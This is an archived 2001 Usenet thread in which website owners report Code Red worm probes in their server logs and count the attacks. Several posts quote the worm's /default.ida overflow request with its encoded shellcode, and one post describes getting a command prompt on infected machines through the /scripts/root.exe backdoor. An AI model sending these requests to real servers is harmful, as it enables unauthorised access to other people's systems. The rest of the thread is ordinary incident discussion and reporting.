code red attempts

Is everyone else getting a bunch of sites looking for

/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNN-
NNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909-
0%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u007-
8%u0000%u00=a

Should I waste my time trying to let people know how dumb they are?


Adam Gordon SBA Design - web site and graphic design
http://www.sbadesign.com adam@sbadesign.com

On Sun, 5 Aug 2001 02:23:24 -0400 Adam Gordon said…

> Should I waste my time trying to let people know how dumb they are?
>

There was a new version of code red that hit today. There is a story on
/. about it right now with some links in the comments about where to send
the reports


John R. Marshall JRM Studios.com - http://www.jrmstudios.com The
Hotrodding Network - http://www.hotrodding.net

I’m getting a fucking TON of:
xxx.xxx.xxx.xxx - - [05/Aug/2001:04:48:03 -0400] “GET /default.ida?XXXXXX-
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX-
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-
XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-
XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u780-
1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u909-
0%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0” 404 279 “-” “-”


Sean S. <?$s=“moc.seiticoeg@osomynus”;$s=ereg_replace(
“osom”,“noom”,$s);$s=strrev($s);echo"mailto:$s";?> Hex(RGB) ->
http://thedoh.dyndns.org/hexrgb/index.php

“Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for
>
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNN NNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNN NNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858-
%uc bd3%u7801%u9090%u6858%uc
>
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00-
=a
>
>
> Should I waste my time trying to let people know how dumb they are?
>
> –
> Adam Gordon SBA Design - web site and graphic design
> http://www.sbadesign.com adam@sbadesign.com

Yes, im getting loads of them as well

Julian Collins www.dvdoptions.com

“Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for
>
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNN NNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNN NNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858-
%uc bd3%u7801%u9090%u6858%uc
>
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00-
=a
>
>
> Should I waste my time trying to let people know how dumb they are?
>
> –
> Adam Gordon SBA Design - web site and graphic design
> http://www.sbadesign.com adam@sbadesign.com

“Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for
>
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNN NNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNN NNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858-
%uc bd3%u7801%u9090%u6858%uc
>
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00-
=a
>
>
> Should I waste my time trying to let people know how dumb they are?

When this are hacking atempts, why not write automatic to all webmasters
of the ISPs from which the attack occured?


Roland Mösl http://pege.org Clear targets for a confused civilization
http://BeingFound.com Web Design starts at the search engine

536 in today’s log alone

Adam Gordon <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for
>
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u685
8%ucbd3%u7801%u9090%u6858%uc
>
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u0
=a
>
>
> Should I waste my time trying to let people know how dumb they are?
>
> –
> Adam Gordon SBA Design - web site and graphic design
> http://www.sbadesign.com adam@sbadesign.com

http://thedoh.dyndns.org/cr/ Updated every now and then…790 so far.


Sean S. <?$s=“moc.seiticoeg@osomynus”;$s=ereg_replace(
“osom”,“noom”,$s);$s=strrev($s);echo"mailto:$s";?> Hex(RGB) ->
http://thedoh.dyndns.org/hexrgb/index.php

“Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for

On Sun, 5 Aug 2001 04:49:18 -0400 Sean S. said…

> I’m getting a fucking TON of:
> xxx.xxx.xxx.xxx - - [05/Aug/2001:04:48:03 -0400] "GET /default.ida?XXXX-
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-
> XXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%u-
> cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801-
> %u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u000-
> 0%u00=a HTTP/1.0" 404 279 “-” “-”

Yep you got the new one.

you might noticed if you telnet to port 80 then type

GET /scripts/root.exe HTTP/1.0

you will get a command prompt. (note! this might be considered as
“Hacking” do at your own risk!!)

BTW http://dshield.org/codered.html wants logs of all code red hits so
they can notify the owners of the infected machines.


John R. Marshall JRM Studios.com - http://www.jrmstudios.com The
Hotrodding Network - http://www.hotrodding.net

“Julian Collins” <juliancollins@dvdoptions.com> wrote in message
news:9kj3ts$22o$1@constitution.worldwebserver.com
> Yes, im getting loads of them as well

Would it be usefull to bring all log files together, to proof that this
users did it not one time, but they tried systematic to hack?


Roland Mösl http://pege.org Clear targets for a confused civilization
http://BeingFound.com Web Design starts at the search engine

It’s already done by ARIS with Security Focus

“Roland Mösl” <founder@pege.org> wrote in message
news:9kjg38$3nf$1@constitution.worldwebserver.com
> “Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
> news:9kioh2$9q$1@constitution.worldwebserver.com
> > Is everyone else getting a bunch of sites looking for
> >
> >
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNN
> >
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNN
> >
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u909-
0%u6858%uc
> bd3%u7801%u9090%u6858%uc
> >
>
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00-
=a
> >
> >
> > Should I waste my time trying to let people know how dumb they are?
>
> When this are hacking atempts, why not write automatic to all webmasters
> of the ISPs from which the attack occured?
>
>
> –
> Roland Mösl http://pege.org Clear targets for a confused civilization
> http://BeingFound.com Web Design starts at the search engine
>

“John R. Marshall” <john@jrmstudios.com> wrote in message
news:MPG.15d6d75c8b3dde9c9897f5@news.worldwebserver.com
> BTW http://dshield.org/codered.html wants logs of all code red hits so
> they can notify the owners of the infected machines.

Bleh. whipped up a quickie perl script to rip out the default.ida lines…

414 attacks so far.


Sean S. <?$s=“moc.seiticoeg@osomynus”;$s=ereg_replace(
“osom”,“noom”,$s);$s=strrev($s);echo"mailto:$s";?> Hex(RGB) ->
http://thedoh.dyndns.org/hexrgb/index.php

> > Yes, im getting loads of them as well
>
> Would it be usefull to bring all log files together, to proof that this
> users did it not one time, but they tried systematic to hack?

No, most computers (I assume atleast 1 computer had to start the attack on
purpose) are only doing the attacks because they themselves were infected.

Jon Caruana e-mail<jcaruana@home.com> Jabber<jon.c@jabber.com>
ICQ<117792886

“Sean S.” <noemail@here.blargh> wrote in message
news:9kj8ch$2kf$1@constitution.worldwebserver.com
> “John R. Marshall” <john@jrmstudios.com> wrote in message
> news:MPG.15d6d75c8b3dde9c9897f5@news.worldwebserver.com
> > BTW http://dshield.org/codered.html wants logs of all code red hits so
> > they can notify the owners of the infected machines.
>
> Bleh. whipped up a quickie perl script to rip out the default.ida
> lines…
>
> 414 attacks so far.

In this month,

107 attacks on pege.org 98 attacks on salzburgs.com 88 attacks on
the-red-phone.com


Roland Mösl http://pege.org Clear targets for a confused civilization
http://BeingFound.com Web Design starts at the search engine

> > BTW http://dshield.org/codered.html wants logs of all code red hits so
> > they can notify the owners of the infected machines.
>
> Bleh. whipped up a quickie perl script to rip out the default.ida
> lines…
>
> 414 attacks so far.

370 attack attempts on my Linux masq box.

grep -c default.ida /var/log/apache/access_log

Jon Caruana e-mail<jcaruana@home.com> Jabber<jon.c@jabber.com>
ICQ<117792886

701 so far.


Sean S. <?$s=“moc.seiticoeg@osomynus”;$s=ereg_replace(
“osom”,“noom”,$s);$s=strrev($s);echo"mailto:$s";?> Hex(RGB) ->
http://thedoh.dyndns.org/hexrgb/index.php